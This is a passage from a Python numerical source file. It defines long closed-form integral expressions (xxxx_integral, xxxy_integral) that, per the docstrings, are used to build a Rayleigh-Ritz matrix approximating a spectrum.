+ 2 * a ** 2 * a_conj ** 2 * (-5 - 4 * b + 3 * b ** 2)
+ 4 * a * a_conj * (-1 - 5 * b - b ** 2 + b ** 3)
)
* np.log(1 + x ** 2)
/ (1 + 2 * a * a_conj - 2 * b + (a * a_conj + b) ** 2) ** (7 / 2)
- 3
* (-1 + a * a_conj + b)
* (
a ** 4 * a_conj ** 4
+ 4 * a ** 3 * a_conj ** 3 * (-1 + b)
+ (-1 + b ** 2) ** 2
+ 2 * a ** 2 * a_conj ** 2 * (-5 - 4 * b + 3 * b ** 2)
+ 4 * a * a_conj * (-1 - 5 * b - b ** 2 + b ** 3)
)
* np.log(
a * a_conj
- b
+ (a * a_conj + b) ** 2
- x ** 2
- a * a_conj * x ** 2
+ b * x ** 2
+ np.sqrt(1 + 2 * a * a_conj - 2 * b + (a * a_conj + b) ** 2)
* np.sqrt(
a ** 2 * a_conj ** 2
+ 2 * a * a_conj * (b - x ** 2)
+ (b + x ** 2) ** 2
)
)
/ (1 + 2 * a * a_conj - 2 * b + (a * a_conj + b) ** 2) ** (7 / 2)
)
return 4 * c * np.pi * ret
if abs(a_conj) < 0.00000001 and (b - 1) ** 2 >= 0.00000001:
ret = (
4 * (-1 + b) ** 2
- (-1 + b) * (1 + b) ** 3 / b
- 4 * (-1 + b) * (1 + 3 * b)
- 4 * (-1 + b) ** 2 / (1 + x ** 2) ** 2
+ 4 * (-1 + b) * (1 + 3 * b) / (1 + x ** 2)
+ (-1 + b) * (1 + b) ** 3 / (b + x ** 2)
+ 6 * (1 + b) ** 2 * np.log(b)
- 6 * (1 + b) ** 2 * np.log(b + x ** 2)
+ 6 * (1 + b) ** 2 * np.log(1 + x ** 2)
) / (2 * (-1 + b) ** 4)
return 4 * c * np.pi * ret
if abs(a_conj) < 0.00000001 and (b - 1) ** 2 < 0.00000001:
ret = x ** 2 * (1 + x ** 4) / (2 * (1 + x ** 2) ** 4)
return 4 * c * np.pi * ret
def xxxx_integral(a, b, c, x):
"""
function involved in computing the a_matrix (Rayleigh Ritz approx of the spectrum)
@param a:
@param b:
@param c:
@param x:
@return:
"""
a_conj = np.conj(a)
if abs(a_conj) >= 0.00000001:
ret = (
1
/ (12 * a ** 4 * a_conj ** 4)
* (
3 * a ** 4
+ 2 * a ** 5 * a_conj
- 4 * a ** 4 * a_conj ** 2
+ 3 * a ** 6 * a_conj ** 2
+ 3 * a_conj ** 4
+ 2 * a ** 2 * a_conj ** 4
+ 2 * a * a_conj ** 5
+ 3 * a ** 2 * a_conj ** 6
+ 9 * (a ** 4 + a_conj ** 4)
+ 9 * a_conj ** 4 * (-1 + b)
- 6 * a ** 4 * b
+ 6 * a ** 5 * a_conj * b
- 6 * a_conj ** 4 * b
+ 6 * a * a_conj ** 5 * b
+ 3 * a ** 4 * b ** 2
+ 3 * a_conj ** 4 * b ** 2
+ a ** 4 * (-9 + 6 * a_conj ** 2 + 9 * b)
- 1
/ (
b
* (a ** 2 * a_conj ** 2 + (-1 + b) ** 2 + 2 * a * a_conj * (1 + b))
** 4
)
* (
np.sqrt((a * a_conj + b) ** 2)
* (
3 * a ** 13 * a_conj ** 9 * b
+ 3 * a_conj ** 4 * (-1 + b) ** 7 * b ** 3
+ a ** 12 * a_conj ** 8 * b * (26 + 27 * b)
+ a
* a_conj ** 5
* (-1 + b) ** 5
* b ** 2
* (9 + 14 * b + 27 * b ** 2)
+ a ** 11
* a_conj ** 7
* (
-3
+ (103 + 2 * a_conj ** 2) * b
+ 161 * b ** 2
+ 108 * b ** 3
)
+ a ** 10
* a_conj ** 6
* (
-12
+ 251 * b
+ 409 * b ** 2
+ 399 * b ** 3
+ 252 * b ** 4
+ 2 * a_conj ** 2 * (-6 + 8 * b + 7 * b ** 2)
)
+ a ** 9
* a_conj ** 5
* (
-18
+ 175 * b
+ 2 * a_conj ** 6 * b
+ 3 * a_conj ** 8 * b
+ 601 * b ** 2
+ 563 * b ** 3
+ 469 * b ** 4
+ 378 * b ** 5
- 6 * a_conj ** 4 * (3 + 2 * b)
+ a_conj ** 2 * (-48 + 266 * b + 64 * b ** 2 + 42 * b ** 3)
)
+ a ** 8
* a_conj ** 4
* (
-12
- 112 * b
+ 307 * b ** 2
+ 407 * b ** 3
+ 285 * b ** 4
+ 175 * b ** 5
+ 378 * b ** 6
+ a_conj ** 8 * b * (26 + 27 * b)
+ 2 * a_conj ** 6 * (-6 + 8 * b + 7 * b ** 2)
- 6 * a_conj ** 4 * (12 - 55 * b + 10 * b ** 2)
+ a_conj ** 2
* (-72 + 88 * b + 754 * b ** 2 + 80 * b ** 3 + 70 * b ** 4)
)
+ a ** 2
* a_conj ** 4
* b
* (
2 * (-3 + b) * (-1 + b) ** 5 * b
+ a_conj ** 2
* (-1 + b) ** 3
* (9 + 70 * b + 74 * b ** 2 + 65 * b ** 3 + 108 * b ** 4)
)
+ a ** 7
* a_conj ** 3
* (
-3
- 125 * b
- 181 * b ** 2
+ 96 * b ** 3
+ 65 * b ** 4
+ 85 * b ** 5
- 189 * b ** 6
+ 252 * b ** 7
- 12
* a_conj ** 4
* (9 - 13 * b - 78 * b ** 2 + 10 * b ** 3)
+ a_conj ** 6 * (-48 + 266 * b + 64 * b ** 2 + 42 * b ** 3)
+ a_conj ** 8 * (-3 + 103 * b + 161 * b ** 2 + 108 * b ** 3)
+ a_conj ** 2
* (
-48
- 538 * b
+ 736 * b ** 2
+ 596 * b ** 3
+ 70 * b ** 5
)
)
+ a ** 5
* (
a_conj * (-1 + b) ** 5 * b ** 2 * (9 + 14 * b + 27 * b ** 2)
+ 2
* a_conj ** 3
* (-1 + b) ** 3
* b
* (-15 - 37 * b - 11 * b ** 2 + 7 * b ** 3)
- 6
* a_conj ** 5
* (
3
+ 60 * b
+ 128 * b ** 2
- 218 * b ** 3
+ 17 * b ** 4
+ 10 * b ** 5
)
+ a_conj ** 7
* (
-48
- 538 * b
+ 736 * b ** 2
+ 596 * b ** 3
+ 70 * b ** 5
)
+ a_conj ** 9
* (
-18
+ 175 * b
+ 601 * b ** 2
+ 563 * b ** 3
+ 469 * b ** 4
+ 378 * b ** 5
)
)
+ a ** 6
* a_conj ** 2
* (
-12
* a_conj ** 4
* (6 + 53 * b - 89 * b ** 2 - 54 * b ** 3 + 10 * b ** 4)
+ a_conj ** 6
* (-72 + 88 * b + 754 * b ** 2 + 80 * b ** 3 + 70 * b ** 4)
+ (-1 + b) ** 3
* b
* (9 + 70 * b + 74 * b ** 2 + 65 * b ** 3 + 108 * b ** 4)
+ a_conj ** 8
* (
-12
+ 251 * b
+ 409 * b ** 2
+ 399 * b ** 3
+ 252 * b ** 4
)
+ 2
* a_conj ** 2
* (
-6
- 172 * b
- 251 * b ** 2
+ 396 * b ** 3
+ 52 * b ** 4
- 40 * b ** 5
+ 21 * b ** 6
)
)
+ a ** 3
* a_conj ** 5
* (-1 + b)
* (
2
* (-1 + b) ** 2
* b
* (-15 - 37 * b - 11 * b ** 2 + 7 * b ** 3)
+ a_conj ** 2
* (
3
+ 128 * b
+ 309 * b ** 2
+ 213 * b ** 3
+ 148 * b ** 4
+ 63 * b ** 5
+ 252 * b ** 6
)
)
+ a ** 4
* (
2 * a_conj ** 2 * (-3 + b) * (-1 + b) ** 5 * b ** 2
+ 3 * (-1 + b) ** 7 * b ** 3
- 6
* a_conj ** 4
* (-1 + b) ** 3
* b
* (15 + 33 * b + 2 * b ** 2)
+ 2
* a_conj ** 6
* (
-6
- 172 * b
- 251 * b ** 2
+ 396 * b ** 3
+ 52 * b ** 4
- 40 * b ** 5
+ 21 * b ** 6
)
+ a_conj ** 8
* (
-12
- 112 * b
+ 307 * b ** 2
+ 407 * b ** 3
+ 285 * b ** 4
+ 175 * b ** 5
+ 378 * b ** 6
)
)
)
)
+ (
-3 * a ** 6 * a_conj ** 2
+ a ** 2 * (4 * a_conj ** 4 - 3 * a_conj ** 6)
+ a ** 4 * (4 * a_conj ** 2 - 3 * (-1 + b) ** 2)
+ a ** 5 * a_conj * (4 - 6 * b)
+ 2 * a * a_conj ** 5 * (2 - 3 * b)
- 3 * a_conj ** 4 * (-1 + b) ** 2
)
/ (1 + x ** 2) ** 3
- 3
* (
2 * a ** 5 * a_conj
+ 2 * a ** 2 * a_conj ** 4
+ 2 * a * a_conj ** 5
+ 3 * a_conj ** 4 * (-1 + b)
+ a ** 4 * (-3 + 2 * a_conj ** 2 + 3 * b)
)
/ (1 + x ** 2) ** 2
- 9 * (a ** 4 + a_conj ** 4) / (1 + x ** 2)
+ 1
/ (1 + 2 * a * a_conj - 2 * b + (a * a_conj + b) ** 2) ** 4
* (
np.sqrt(-4 * a * a_conj * x ** 2 + (a * a_conj + b + x ** 2) ** 2)
* (
1
/ (1 + x ** 2) ** 3
* (
(
a ** 2 * a_conj ** 2
+ (-1 + b) ** 2
+ 2 * a * a_conj * (1 + b)
)
** 2
* (
3 * a ** 9 * a_conj ** 5
+ 3 * a_conj ** 4 * (-1 + b) ** 5
+ 5 * a ** 8 * a_conj ** 4 * (1 + 3 * b)
+ 5 * a * a_conj ** 5 * (-1 + b) ** 3 * (1 + 3 * b)
+ a ** 7
* (-4 * a_conj ** 5 + 30 * a_conj ** 3 * b ** 2)
+ 6
* a ** 3
* a_conj ** 5
* (2 + (-2 + 5 * a_conj ** 2) * b ** 2)
+ 2
* a ** 2
* a_conj ** 4
* (-1 + b)
* (-2 + 4 * b + (-2 + 15 * a_conj ** 2) * b ** 2)
- 6
* a ** 6
* (
-5 * a_conj ** 2 * (-1 + b) * b ** 2
+ 2 * a_conj ** 4 * (1 + b)
)
+ a ** 4
* (
-12 * a_conj ** 4 * (-1 + b)
- 4 * a_conj ** 2 * (-1 + b) ** 3
+ 3 * (-1 + b) ** 5
- 12 * a_conj ** 6 * (1 + b)
+ 5 * a_conj ** 8 * (1 + 3 * b)
)
+ a ** 5
* (
-12 * a_conj ** 5
- 4 * a_conj ** 7
+ 3 * a_conj ** 9
+ 5 * a_conj * (-1 + b) ** 3 * (1 + 3 * b)
- 12 * a_conj ** 3 * (-1 + b ** 2)
)
)
)
+ 1
/ (1 + x ** 2) ** 2
* (
(
a ** 2 * a_conj ** 2
+ (-1 + b) ** 2
+ 2 * a * a_conj * (1 + b)
)
* (
9 * a ** 10 * a_conj ** 6
+ 6 * a_conj ** 4 * (-1 + b) ** 6
+ a * a_conj ** 5 * (-1 + b) ** 4 * (31 + 39 * b)
+ a ** 9 * a_conj ** 5 * (29 + 6 * a_conj ** 2 + 51 * b)
+ 2
* a ** 8
* (
a_conj ** 6 * (13 + 15 * b)
+ 5 * a_conj ** 4 * (2 + 7 * b + 12 * b ** 2)
)
+ a ** 2
* (
2 * a_conj ** 4 * (-1 + b) ** 4 * (-1 + 3 * b)
+ 5
* a_conj ** 6
* (-1 + b) ** 2
* (11 + 16 * b + 21 * b ** 2)
)
+ 2
* a ** 7
* a_conj ** 3
* (
15
+ 18 * a_conj ** 4
+ 3 * a_conj ** 6
+ 75 * b ** 3
+ a_conj ** 2 * (-32 + 26 * b + 30 * b ** 2)
)
+ a ** 5
* (
a_conj * (-1 + b) ** 4 * (31 + 39 * b)
+ a_conj ** 9 * (29 + 51 * b)
+ 36 * a_conj ** 5 * (-2 - 3 * b + 3 * b ** 2)
+ 2
* a_conj ** 3
* (-1 + b) ** 2
* (-7 + 4 * b + 15 * b ** 2)
+ a_conj ** 7 * (-64 + 52 * b + 60 * b ** 2)
)
+ 2
* a ** 3
* (
a_conj ** 5
* (-1 + b) ** 2
* (-7 + 4 * b + 15 * b ** 2)
+ 15 * a_conj ** 7 * (1 + 5 * b ** 3)
)
+ a ** 6
* a_conj ** 2
* (
9 * a_conj ** 8
+ 12 * a_conj ** 4 * (-4 + 9 * b)
+ a_conj ** 6 * (26 + 30 * b)
+ 5 * (-1 + b) ** 2 * (11 + 16 * b + 21 * b ** 2)
+ 12 * a_conj ** 2 * (-8 - 9 * b + 5 * b ** 3)
)
+ 2
* a ** 4
* (
3 * (-1 + b) ** 6
+ a_conj ** 2 * (-1 + b) ** 4 * (-1 + 3 * b)
+ 6 * a_conj ** 4 * (-1 + b) ** 2 * (1 + 3 * b)
+ 5 * a_conj ** 8 * (2 + 7 * b + 12 * b ** 2)
+ 6 * a_conj ** 6 * (-8 - 9 * b + 5 * b ** 3)
)
)
)
+ 1
/ (1 + x ** 2)
* (
18 * a ** 11 * a_conj ** 7
+ 3 * a_conj ** 4 * (-1 + b) ** 7
+ 2 * a * a_conj ** 5 * (-1 + b) ** 5 * (13 + 12 * b)
+ a ** 10 * a_conj ** 6 * (101 + 6 * a_conj ** 2 + 99 * b)
- 2
* a ** 9
* a_conj ** 5
* (
-29
+ 18 * a_conj ** 4
- 167 * b
- 114 * b ** 2
- 4 * a_conj ** 2 * (31 + 3 * b)
)
+ a ** 2
* a_conj ** 4
* (-1 + b) ** 3
* (
-2 * (-1 + b) ** 2 * (-1 + 3 * b)
+ a_conj ** 2 * (103 + 154 * b + 93 * b ** 2)
)
+ 2
* a ** 3
* a_conj ** 5
* (-1 + b)
* (
-4 * (-1 + b) ** 2 * (-2 + b + 3 * b ** 2)
+ 5
* a_conj ** 2
* (23 + 29 * b + 29 * b ** 2 + 21 * b ** 3)
)
+ a ** 8
* a_conj ** 4
* (
6 * a_conj ** 6
- 36 * a_conj ** 4 * (-6 + 5 * b)
+ a_conj ** 2 * (322 + 712 * b + 30 * b ** 2)
+ 5 * (-35 + 37 * b + 73 * b ** 2 + 57 * b ** 3)
)
+ a ** 6
* a_conj ** 2
* (
a_conj ** 8 * (101 + 99 * b)
+ a_conj ** 6 * (322 + 712 * b + 30 * b ** 2)
+ (-1 + b) ** 3 * (103 + 154 * b + 93 * b ** 2)
- 12
* a_conj ** 4
* (13 - 63 * b - 54 * b ** 2 + 30 * b ** 3)
- 2
* a_conj ** 2
* (
91
+ 180 * b
- 162 * b ** 2
- 124 * b ** 3
+ 15 * b ** 4
)
)
- a ** 4
* (
-3 * (-1 + b) ** 7
+ 2 * a_conj ** 2 * (-1 + b) ** 5 * (-1 + 3 * b)
+ 12
* a_conj ** 4
* (-1 + b) ** 3
* (1 + 9 * b + 3 * b ** 2)
- 5
* a_conj ** 8
* (-35 + 37 * b + 73 * b ** 2 + 57 * b ** 3)
+ 2
* a_conj ** 6
* (
91
+ 180 * b
- 162 * b ** 2
- 124 * b ** 3
+ 15 * b ** 4
)
)
+ 2
* a ** 5
* (
a_conj * (-1 + b) ** 5 * (13 + 12 * b)
- 4
* a_conj ** 3
* (-1 + b) ** 3
* (-2 + b + 3 * b ** 2)
+ 4 * a_conj ** 7 * (-11 + 76 * b + 85 * b ** 2)
+ a_conj ** 9 * (29 + 167 * b + 114 * b ** 2)
- 6
* a_conj ** 5
* (
17
+ 40 * b
- 54 * b ** 2
- 18 * b ** 3
+ 15 * b ** 4
)
)
+ 2
* a ** 7
* a_conj ** 3
* (
9 * a_conj ** 8
+ 4 * a_conj ** 6 * (31 + 3 * b)
+ a_conj ** 4 * (156 + 324 * b - 180 * b ** 2)
+ 4 * a_conj ** 2 * (-11 + 76 * b + 85 * b ** 2)
+ 5 * (-23 - 6 * b + 8 * b ** 3 + 21 * b ** 4)
)
)
- 1
/ (
b
* (
a ** 2 * a_conj ** 2
+ 2 * a * a_conj * (b - x ** 2)
+ (b + x ** 2) ** 2
)
)
* (
3
* a ** 2
* a_conj ** 2
* (a + a_conj) ** 4
* (
a ** 7 * a_conj ** 7
- a ** 6 * a_conj ** 6 * (-4 + 5 * b + x ** 2)
+ a ** 5
* a_conj ** 5
* (6 - 35 * b ** 2 - 4 * x ** 2 - 2 * b * (-4 + x ** 2))
+ a ** 4
* a_conj ** 4
* (
4
- 65 * b ** 3
- 6 * x ** 2
+ b * (30 - 20 * x ** 2)
+ 5 * b ** 2 * (-4 + x ** 2)
)
+ (-1 + b) ** 3
* b ** 2
* (5 * b ** 2 + 5 * x ** 2 + 3 * b * (1 + x ** 2))
+ a ** 3
* a_conj ** 3
* (
1
- 45 * b ** 4
- 4 * x ** 2
+ b ** 2 * (60 - 40 * x ** 2)
+ 20 * b ** 3 * (-4 + x ** 2)
- 8 * b * (-2 + 3 * x ** 2)
)
+ a ** 2
* a_conj ** 2
* (
b ** 5
- x ** 2
+ b ** 3 * (60 - 40 * x ** 2)
+ b ** 2 * (24 - 36 * x ** 2)
+ 25 * b ** 4 * (-4 + x ** 2)
+ b * (-1 + 4 * x ** 2)
)
+ a
* a_conj
* (-1 + b)
* b
* (
15 * b ** 4
- 10 * x ** 2
+ b * (5 - 30 * x ** 2)
- b ** 2 * (11 + 6 * x ** 2)
+ b ** 3 * (-41 + 14 * x ** 2)
)
)
)
)
)
+ 1
/ (1 + 2 * a * a_conj - 2 * b + (a * a_conj + b) ** 2) ** (9 / 2)
* (
24
* a ** 4
* a_conj ** 4
* (1 + a * a_conj + b)
* (
a ** 6 * a_conj ** 2 * (-5 + 3 * a_conj ** 2)
- 3 * (-1 + b) ** 4 * b
- 5 * a_conj ** 4 * (1 + 5 * b + b ** 2)
+ 3 * a_conj ** 2 * (-1 + b) ** 2 * (1 + 8 * b + b ** 2)
+ 2
* a ** 5
* (
3 * a_conj ** 5
- 5 * a_conj * (1 + b)
+ a_conj ** 3 * (-4 + 6 * b)
)
+ 4
* a ** 3
* a_conj
* (
-2
- 13 * b
+ 7 * b ** 2
+ 3 * b ** 3
+ a_conj ** 4 * (-2 + 3 * b)
+ 3 * a_conj ** 2 * (-2 + b + 2 * b ** 2)
)
+ a ** 4
* (
3 * a_conj ** 6
+ 3 * a_conj ** 4 * (-2 + 7 * b)
- 5 * (1 + 5 * b + b ** 2)
+ 2 * a_conj ** 2 * (-11 + b + 9 * b ** 2)
)
- 2
* a
* (
5 * a_conj ** 5 * (1 + b)
+ 3 * a_conj * (-1 + b) ** 2 * (-1 - 6 * b + b ** 2)
+ a_conj ** 3 * (4 + 26 * b - 14 * b ** 2 - 6 * b ** 3)
)
+ a ** 2
* (
-5 * a_conj ** 6
+ 3 * (-1 + b) ** 2 * (1 + 8 * b + b ** 2)
+ 2 * a_conj ** 4 * (-11 + b + 9 * b ** 2)
+ 6 * a_conj ** 2 * (-1 - 12 * b + 9 * b ** 2 + b ** 3)
)
)
* np.log(
a * a_conj
- b
+ (a * a_conj + b) ** 2
+ np.sqrt((a * a_conj + b) ** 2)
* np.sqrt(1 + 2 * a * a_conj - 2 * b + (a * a_conj + b) ** 2)
)
)
+ 1
/ (1 + 2 * a * a_conj - 2 * b + (a * a_conj + b) ** 2) ** (9 / 2)
* (
24
* a ** 4
* a_conj ** 4
* (1 + a * a_conj + b)
* (
a ** 6 * a_conj ** 2 * (-5 + 3 * a_conj ** 2)
- 3 * (-1 + b) ** 4 * b
- 5 * a_conj ** 4 * (1 + 5 * b + b ** 2)
+ 3 * a_conj ** 2 * (-1 + b) ** 2 * (1 + 8 * b + b ** 2)
+ 2
* a ** 5
* (
3 * a_conj ** 5
- 5 * a_conj * (1 + b)
+ a_conj ** 3 * (-4 + 6 * b)
)
+ 4
* a ** 3
* a_conj
* (
-2
- 13 * b
+ 7 * b ** 2
+ 3 * b ** 3
+ a_conj ** 4 * (-2 + 3 * b)
+ 3 * a_conj ** 2 * (-2 + b + 2 * b ** 2)
)
+ a ** 4
* (
3 * a_conj ** 6
+ 3 * a_conj ** 4 * (-2 + 7 * b)
- 5 * (1 + 5 * b + b ** 2)
+ 2 * a_conj ** 2 * (-11 + b + 9 * b ** 2)
)
- 2
* a
* (
5 * a_conj ** 5 * (1 + b)
+ 3 * a_conj * (-1 + b) ** 2 * (-1 - 6 * b + b ** 2)
+ a_conj ** 3 * (4 + 26 * b - 14 * b ** 2 - 6 * b ** 3)
)
+ a ** 2
* (
-5 * a_conj ** 6
+ 3 * (-1 + b) ** 2 * (1 + 8 * b + b ** 2)
+ 2 * a_conj ** 4 * (-11 + b + 9 * b ** 2)
+ 6 * a_conj ** 2 * (-1 - 12 * b + 9 * b ** 2 + b ** 3)
)
)
* np.log(1 + x ** 2)
)
- 1
/ (1 + 2 * a * a_conj - 2 * b + (a * a_conj + b) ** 2) ** (9 / 2)
* (
24
* a ** 4
* a_conj ** 4
* (1 + a * a_conj + b)
* (
a ** 6 * a_conj ** 2 * (-5 + 3 * a_conj ** 2)
- 3 * (-1 + b) ** 4 * b
- 5 * a_conj ** 4 * (1 + 5 * b + b ** 2)
+ 3 * a_conj ** 2 * (-1 + b) ** 2 * (1 + 8 * b + b ** 2)
+ 2
* a ** 5
* (
3 * a_conj ** 5
- 5 * a_conj * (1 + b)
+ a_conj ** 3 * (-4 + 6 * b)
)
+ 4
* a ** 3
* a_conj
* (
-2
- 13 * b
+ 7 * b ** 2
+ 3 * b ** 3
+ a_conj ** 4 * (-2 + 3 * b)
+ 3 * a_conj ** 2 * (-2 + b + 2 * b ** 2)
)
+ a ** 4
* (
3 * a_conj ** 6
+ 3 * a_conj ** 4 * (-2 + 7 * b)
- 5 * (1 + 5 * b + b ** 2)
+ 2 * a_conj ** 2 * (-11 + b + 9 * b ** 2)
)
- 2
* a
* (
5 * a_conj ** 5 * (1 + b)
+ 3 * a_conj * (-1 + b) ** 2 * (-1 - 6 * b + b ** 2)
+ a_conj ** 3 * (4 + 26 * b - 14 * b ** 2 - 6 * b ** 3)
)
+ a ** 2
* (
-5 * a_conj ** 6
+ 3 * (-1 + b) ** 2 * (1 + 8 * b + b ** 2)
+ 2 * a_conj ** 4 * (-11 + b + 9 * b ** 2)
+ 6 * a_conj ** 2 * (-1 - 12 * b + 9 * b ** 2 + b ** 3)
)
)
* np.log(
a * a_conj
- b
+ (a * a_conj + b) ** 2
- x ** 2
- a * a_conj * x ** 2
+ b * x ** 2
+ np.sqrt(1 + 2 * a * a_conj - 2 * b + (a * a_conj + b) ** 2)
* np.sqrt(
-4 * a * a_conj * x ** 2 + (a * a_conj + b + x ** 2) ** 2
)
)
)
)
)
return 4 * np.pi * c * ret
if abs(a_conj) < 0.00000001 and abs(b - 1) ** 2 >= 0.00000001:
ret = (
(-1 + b) ** 3
+ 3 * (-1 + b) * b
- 3 * (-1 + b) ** 2 * b
+ 3 * (-1 + b) * b * (2 + b)
- (-1 + b) ** 3 / (1 + x ** 2) ** 3
+ 3 * (-1 + b) ** 2 * b / (1 + x ** 2) ** 2
- 3 * (-1 + b) * b * (2 + b) / (1 + x ** 2)
- 3 * (-1 + b) * b ** 2 / (b + x ** 2)
- 6 * b * (1 + b) * np.log(b)
+ 6 * b * (1 + b) * np.log(b + x ** 2)
- 6 * b * (1 + b) * np.log(1 + x ** 2)
) / (6 * (-1 + b) ** 5)
return 24 * np.pi * c * ret # 12 as integral of 2cos^4 is 12pi
if abs(a_conj) < 0.00000001 and abs(b - 1) ** 2 < 0.00000001:
ret = x ** 6 * (10 + 5 * x ** 2 + x ** 4) / (60 * (1 + x ** 2) ** 5)
return 24 * np.pi * c * ret
def xxxy_integral(a, b, c, x):
"""
function involved in computing the a_matrix (Rayleigh Ritz approx of the spectrum)
@param a:
@param b:
@param c:
@param x:
@return:
"""
a_conj = np.conj(a)
if abs(a_conj) >= 0.00000001:
ret = (
1
/ 12
* (a ** 2 - a_conj ** 2)
* (
9 * (a ** 2 + a_conj ** 2) / (a ** 4 * a_conj ** 4)
+ (
3 * a ** 4 * a_conj ** 2
+ a ** 2 * (-2 * a_conj ** 2 + 3 * a_conj ** 4 + 3 * (-1 + b) ** 2)
+ 3 * a_conj ** 2 * (-1 + b) ** 2
+ 2 * a ** 3 * a_conj * (-2 + 3 * b)
+ 2 * a * a_conj ** 3 * (-2 + 3 * b)
)
/ (a ** 4 * a_conj ** 4)
+ (
6 * a ** 3 * a_conj
+ 6 * a * a_conj ** 3
+ 9 * a_conj ** 2 * (-1 + b)
+ 3 * a ** 2 * (-3 + a_conj ** 2 + 3 * b)
)
/ (a ** 4 * a_conj ** 4)
- 1
/ (
a ** 4
* a_conj ** 4
* b
* (a ** 2 * a_conj ** 2 + (-1 + b) ** 2 + 2 * a * a_conj * (1 + b))
** 4
)
* (
np.sqrt((a * a_conj + b) ** 2)
* (
3 * a ** 11 * a_conj ** 9 * b
+ 3 * a_conj ** 2 * (-1 + b) ** 7 * b ** 3
+ a ** 10 * a_conj ** 8 * b * (26 + 27 * b)
+ a
* a_conj ** 3
* (-1 + b) ** 5
* b ** 2
* (9 + 14 * b + 27 * b ** 2)
+ a ** 9
* a_conj ** 7
* (
-3
+ (103 + a_conj ** 2 + 3 * a_conj ** 4) * b
+ 161 * b ** 2
+ 108 * b ** 3
)
+ a ** 8
* a_conj ** 6
* (
-12
+ 251 * b
+ 409 * b ** 2
+ 399 * b ** 3
+ 252 * b ** 4
+ a_conj ** 4 * b * (26 + 27 * b)
+ a_conj ** 2 * (-6 + 8 * b + 7 * b ** 2)
)
+ a ** 7
* a_conj ** 5
* (
-18
+ 175 * b
+ 601 * b ** 2
+ 563 * b ** 3
+ 469 * b ** 4
+ 378 * b ** 5
+ a_conj ** 2 * (-24 + 133 * b + 32 * b ** 2 + 21 * b ** 3)
+ a_conj ** 4 * (-3 + 103 * b + 161 * b ** 2 + 108 * b ** 3)
)
+ a ** 2
* b
* (
a_conj ** 2 * (-3 + b) * (-1 + b) ** 5 * b
+ 3 * (-1 + b) ** 7 * b ** 2
+ a_conj ** 4
* (-1 + b) ** 3
* (9 + 70 * b + 74 * b ** 2 + 65 * b ** 3 + 108 * b ** 4)
)
+ a ** 6
* a_conj ** 4
* (
-12
- 112 * b
+ 307 * b ** 2
+ 407 * b ** 3
+ 285 * b ** 4
+ 175 * b ** 5
+ 378 * b ** 6
+ a_conj ** 2
* (-36 + 44 * b + 377 * b ** 2 + 40 * b ** 3 + 35 * b ** 4)
+ a_conj ** 4
* (
-12
+ 251 * b
+ 409 * b ** 2
+ 399 * b ** 3
+ 252 * b ** 4
)
)
+ a ** 5
* a_conj ** 3
* (
-3
- 125 * b
- 181 * b ** 2
+ 96 * b ** 3
+ 65 * b ** 4
+ 85 * b ** 5
- 189 * b ** 6
+ 252 * b ** 7
+ a_conj ** 2
* (
-24
- 269 * b
+ 368 * b ** 2
+ 298 * b ** 3
+ 35 * b ** 5
)
+ a_conj ** 4
* (
-18
+ 175 * b
+ 601 * b ** 2
+ 563 * b ** 3
+ 469 * b ** 4
+ 378 * b ** 5
)
)
+ a ** 3
* a_conj
* (-1 + b)
* (
(-1 + b) ** 4 * b ** 2 * (9 + 14 * b + 27 * b ** 2)
+ a_conj ** 2
* (-1 + b) ** 2
* b
* (-15 - 37 * b - 11 * b ** 2 + 7 * b ** 3)
+ a_conj ** 4
* (
3
+ 128 * b
+ 309 * b ** 2
+ 213 * b ** 3
+ 148 * b ** 4
+ 63 * b ** 5
+ 252 * b ** 6
)
)
+ a ** 4
* (
a_conj ** 2
* (-1 + b) ** 3
* b
* (9 + 70 * b + 74 * b ** 2 + 65 * b ** 3 + 108 * b ** 4)
+ a_conj ** 4
* (
-6
- 172 * b
- 251 * b ** 2
+ 396 * b ** 3
+ 52 * b ** 4
- 40 * b ** 5
+ 21 * b ** 6
)
+ a_conj ** 6
* (
-12
- 112 * b
+ 307 * b ** 2
+ 407 * b ** 3
+ 285 * b ** 4
+ 175 * b ** 5
+ 378 * b ** 6
)
)
)
)
+ (
-3 * a ** 4 * a_conj ** 2
+ a ** 2 * (2 * a_conj ** 2 - 3 * a_conj ** 4 - 3 * (-1 + b) ** 2)
+ a ** 3 * a_conj * (4 - 6 * b)
+ 2 * a * a_conj ** 3 * (2 - 3 * b)
- 3 * a_conj ** 2 * (-1 + b) ** 2
)
/ (a ** 4 * a_conj ** 4 * (1 + x ** 2) ** 3)
- 3
* (
2 * a ** 3 * a_conj
+ 2 * a * a_conj ** 3
+ 3 * a_conj ** 2 * (-1 + b)
+ a ** 2 * (-3 + a_conj ** 2 + 3 * b)
)
/ (a ** 4 * a_conj ** 4 * (1 + x ** 2) ** 2)
- 9 * (a ** 2 + a_conj ** 2) / (a ** 4 * a_conj ** 4 * (1 + x ** 2))
+ 1
/ (
a ** 4
* a_conj ** 4
* (1 + 2 * a * a_conj - 2 * b + (a * a_conj + b) ** 2) ** 4
)
* (
np.sqrt(
(a * a_conj + b) ** 2
- 2 * a * a_conj * x ** 2
+ 2 * b * x ** 2
+ x ** 4
)
* (
1
/ (1 + x ** 2) ** 3
* (
(
a ** 2 * a_conj ** 2
+ (-1 + b) ** 2
+ 2 * a * a_conj * (1 + b)
)
** 2
* (
3 * a ** 7 * a_conj ** 5
+ 3 * a_conj ** 2 * (-1 + b) ** 5
+ 5 * a ** 6 * a_conj ** 4 * (1 + 3 * b)
+ 5 * a * a_conj ** 3 * (-1 + b) ** 3 * (1 + 3 * b)
+ a ** 5
* (
-2 * a_conj ** 5
+ 3 * a_conj ** 7
+ 30 * a_conj ** 3 * b ** 2
)
+ a ** 2
* (-1 + b)
* (
-2 * a_conj ** 2 * (-1 + b) ** 2
+ 3 * (-1 + b) ** 4
+ 30 * a_conj ** 4 * b ** 2
)
+ a ** 4
* (
30 * a_conj ** 2 * (-1 + b) * b ** 2
- 6 * a_conj ** 4 * (1 + b)
+ 5 * a_conj ** 6 * (1 + 3 * b)
)
+ a ** 3
* (
30 * a_conj ** 5 * b ** 2
+ 5 * a_conj * (-1 + b) ** 3 * (1 + 3 * b)
- 6 * a_conj ** 3 * (-1 + b ** 2)
)
)
)
+ 1
/ (1 + x ** 2) ** 2
* (
(
a ** 2 * a_conj ** 2
+ (-1 + b) ** 2
+ 2 * a * a_conj * (1 + b)
)
* (
9 * a ** 8 * a_conj ** 6
+ 6 * a_conj ** 2 * (-1 + b) ** 6
+ a * a_conj ** 3 * (-1 + b) ** 4 * (31 + 39 * b)
